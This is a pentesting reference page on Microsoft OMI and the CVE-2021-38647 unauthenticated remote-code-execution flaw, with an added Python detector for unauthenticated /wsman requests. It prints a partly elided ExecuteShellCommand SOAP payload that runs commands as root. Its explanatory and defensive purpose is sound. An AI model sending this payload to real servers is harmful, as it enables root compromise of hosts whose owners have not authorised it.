5985,5986 - Pentesting OMI
Basic Information
OMI is presented by Microsoft as an open-source tool designed for remote configuration management. It is particularly relevant for Linux servers on Azure that use services such as:
- Azure Automation
- Azure Automatic Update
- Azure Operations Management Suite
- Azure Log Analytics
- Azure Configuration Management
- Azure Diagnostics
The `omiengine` process is started and listens on all interfaces as root when these services are enabled.
The default ports used are 5985 (http) and 5986 (https).
CVE-2021-38647 Vulnerability
As observed on September 16, Linux servers deployed in Azure with the services listed above are susceptible because of a vulnerable version of OMI. The vulnerability lies in how the OMI server handles messages sent to the `/wsman` endpoint: it does not require an Authentication header and incorrectly authorizes the client.
An attacker can exploit this by sending an "ExecuteShellCommand" SOAP payload without an Authentication header, forcing the server to execute commands with root privileges.
```xml
<s:Envelope xmlns:s="http://www.w3.org/2003/05/soap-envelope" xmlns:a="http://schemas.xmlsoap.org/ws/2004/08/addressing"
   ...
   <s:Body>
      <p:ExecuteShellCommand_INPUT xmlns:p="http://schemas.dmtf.org/wbem/wscim/1/cim-schema/2/SCX_OperatingSystem">
         <p:command>id</p:command>
         <p:timeout>0</p:timeout>
      </p:ExecuteShellCommand_INPUT>
   </s:Body>
</s:Envelope>
```
For more information about the CVE, check this.
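A detection sketch for the behaviour described above, added here as an example and not taken from the original page or from OMI: it labels captured HTTP requests sent to ports 5985/5986 and flags POSTs to `/wsman` that carry no `Authorization` header. It assumes the requests are available in cleartext (for example from port 5985 or a TLS-terminating proxy); the function names, labels and sample traffic are constructed for illustration.

```python
from email.parser import BytesParser  # stdlib parser for "Name: value" header blocks

OMI_PORTS = {5985, 5986}  # default OMI ports named on this page

def parse_request(raw: bytes):
    """Split a raw HTTP/1.1 request into (method, path, headers, body)."""
    head, _, body = raw.partition(b"\r\n\r\n")
    request_line, _, header_block = head.partition(b"\r\n")
    parts = request_line.decode("latin-1").split()
    if len(parts) != 3:
        raise ValueError("malformed request line")
    headers = BytesParser().parsebytes(header_block + b"\r\n\r\n", headersonly=True)
    return parts[0].upper(), parts[1], headers, body

def classify(raw: bytes, dst_port: int) -> str:
    """Label one captured request: ignore, malformed, has-auth, no-auth, no-auth-exec."""
    if dst_port not in OMI_PORTS:
        return "ignore"
    try:
        method, path, headers, body = parse_request(raw)
    except ValueError:
        return "malformed"
    if method != "POST" or path.split("?")[0].rstrip("/").lower() != "/wsman":
        return "ignore"
    # Header lookup is case-insensitive; an empty value is treated as absent.
    if str(headers.get("Authorization") or "").strip():
        return "has-auth"
    # No credentials on /wsman: escalate when the body names ExecuteShellCommand.
    return "no-auth-exec" if b"ExecuteShellCommand" in body else "no-auth"

# Constructed sample traffic (host name and credential value are placeholders).
HDR = b"POST /wsman HTTP/1.1\r\nHost: omi.example\r\nContent-Type: application/soap+xml\r\n"
EXEC = b"<p:ExecuteShellCommand_INPUT><p:command>id</p:command></p:ExecuteShellCommand_INPUT>"
SAMPLES = [
    (5986, HDR + b"\r\n" + EXEC),
    (5986, HDR + b"authorization: Basic cGxhY2Vob2xkZXI=\r\n\r\n" + EXEC),
    (5985, HDR + b"\r\n<s:Envelope/>"),
    (5985, b"GET / HTTP/1.1\r\nHost: omi.example\r\n\r\n"),
    (8080, HDR + b"\r\n" + EXEC),
]

def scan(samples=SAMPLES):
    """Return the label for every (port, request) pair, in order."""
    return [classify(raw, port) for port, raw in samples]

if __name__ == "__main__":
    for (port, _), label in zip(SAMPLES, scan()):
        print(port, label)
```

The `has-auth` label only means a credential header was present, not that the credentials were valid; `no-auth-exec` is the request shape this page describes.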
References
- https://www.horizon3.ai/omigod-rce-vulnerability-in-multiple-azure-linux-deployments/
- https://blog.wiz.io/omigod-critical-vulnerabilities-in-omi-azure/